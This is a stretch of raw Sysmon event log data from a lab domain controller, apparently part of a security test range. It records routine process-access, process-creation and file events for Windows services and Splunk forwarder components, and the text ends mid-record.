12:03:06.338{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64FA-6064-0C01-00000000AE01}4480C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:06.011{266CAFBE-64C4-6064-9B00-00000000AE01}4924ATTACKRANGE\AdministratorC:\Windows\System32\RuntimeBroker.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.dbMD5=F07609C102FE3E5BB73F94C058C36A3E,SHA256=C30F275A0D0A518231316A9E8EF8EC9502369C28CAAE0A71496B12996E8BC10E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.881{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.881{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000008678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.689{266CAFBE-64F5-6064-0301-00000000AE01}6500win-dc-892.attackrange.local010.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000008677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.523{266CAFBE-64FB-6064-0E01-00000000AE01}64206408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FB-6064-0E01-00000000AE01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64FB-6064-0E01-00000000AE01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.351{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FB-6064-0E01-00000000AE01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:07.352{266CAFBE-64FB-6064-0E01-00000000AE01}6420C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.973{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.833{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.333{266CAFBE-64FC-6064-0F01-00000000AE01}62002460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FC-6064-0F01-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64FC-6064-0F01-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.162{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FC-6064-0F01-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 